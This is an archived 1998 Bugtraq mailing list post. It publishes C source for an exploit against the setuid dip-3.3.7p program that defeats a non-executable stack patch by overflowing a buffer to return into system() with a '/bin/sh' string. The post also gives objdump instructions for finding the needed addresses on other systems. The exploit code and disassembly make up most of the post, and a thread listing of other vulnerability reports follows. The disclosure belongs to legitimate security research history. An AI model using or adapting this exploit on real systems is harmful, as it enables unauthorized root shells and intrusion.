Bugtraq mailing list archives
dip-3.3.7p exploit (stackpatch_
From: tstroege () CIP INFORMATIK UNI-ERLANGEN DE (Thomas Troeger)
Date: Fri, 26 Jun 1998 17:46:53 +0200
Hi, While playing around with dip-3.3.7p I realized that the method I used in my previous posting won't do. So I had a look at the source and developed a new program. Here it goes: ------------------- sammeltonne.c ------------------- /* * Programm to get a shell from dip-3.3.7p on a system with * Solar Designer's stackpatch installed. * by tstroege () cip informatik uni-erlangen de * * Of course this is just for educational purposes too :) */ #define SOMETEXT 0x0804cee5 /* address of text system call */ #define CMDSTR 0x08054f0e /* address where command string should be */ #define DIP "/usr/sbin/dip" /* path of dip */ int main(int argc, char *argv[]) { char mem[256], *ptr; char *name[]={ DIP, "-k", "-l", mem, (char *)0 }; int i, code[]={ SOMETEXT, CMDSTR, 0 }; int off=117; if (argc > 1) off=atoi(argv[1]); for (ptr=mem, i=0; i < 256; i++) *ptr++='a'; ptr=mem+off; strcpy(ptr, (char *)&(code[0])); mem[255]=0; execve(name[0], name, 0); return 0; } ----------------------------------------------- SOMETEXT: address in text segment where system is called. CMDSTR: address in text segment where a suitable command string is stored (dip is nice enough to have a /bin/sh string in its code). The both addresses will be different on your system, so here is a way to find them out: ... objdump --disassemble-all /usr/sbin/dip ... Now search for the following pattern: ... 0804ced4 pushl %ebx 0804ced5 pushl $0x8054848 0804ceda pushl $0x6 0804cedc call 08049678 0804cee1 addl $0xc,%esp 0804cee4 pushl %ebx -->0804cee5 call 080493c8 SOMETEXT 0804ceea addl $0x4,%esp 0804ceed testl %eax,%eax 0804ceef jne 0804cf9e 0804cef5 pushl %esi 0804cef6 movl 0x8(%ebp),%eax 0804cef9 movl 0x660(%eax),%eax 0804ceff pushl %eax ... 0804eefd leal 0xfffffc00(%ebp),%eax 0804ef03 pushl %eax 0804ef04 pushl $0x8054f08 0804ef09 pushl $0x8054f0b 0804ef0e pushl $0x8054f0e<-- CMDSTR 0804ef13 call 08049368 0804ef18 pushl $0x7f 0804ef1a call 08049768 0804ef1f nop ... tst.
Current thread:
- Bug is sudo?, (continued)
- Bug is sudo? Rhodie (Jun 25)
- Re: Bug is sudo? Warner Losh (Jun 26)
- Re: Bug is sudo? Todd C. Miller (Jun 27)
- Re: security hole in mailx Alvaro Martinez Echevarria (Jun 25)
- Re: security hole in mailx Ben Collins (Jun 25)
- Re: security hole in mailx Theo de Raadt (Jun 25)
- guestbook script is still vulnerable under apache Stunt Pope (Jun 25)
- Re: guestbook script is still vulnerable under apache Theo Van Dinter (Jun 25)
- Re: guestbook script is still vulnerable under apache Andru Luvisi (Jun 25)
- Re: guestbook script is still vulnerable under apache Lincoln Stein (Jun 26)
- dip-3.3.7p exploit (stackpatch_ Thomas Troeger (Jun 26)
- And another qpopper overflow (does this make 3?) Aaron D. Gifford (Jun 28)
- Re: dip-3.3.7p exploit (stackpatch_ M.C.Mar (Jun 28)
- WIPO Bill Aleph One (Jun 25)
- Re: guestbook script is still vulnerable under apache Dean Gaudet (Jun 25)
- Re: guestbook script is still vulnerable under apache Lars Eilebrecht (Jun 25)
- Re: guestbook script is still vulnerable under apache Andrew Clegg (Jun 26)
- Re: security hole in mailx Seth McGann (Jun 25)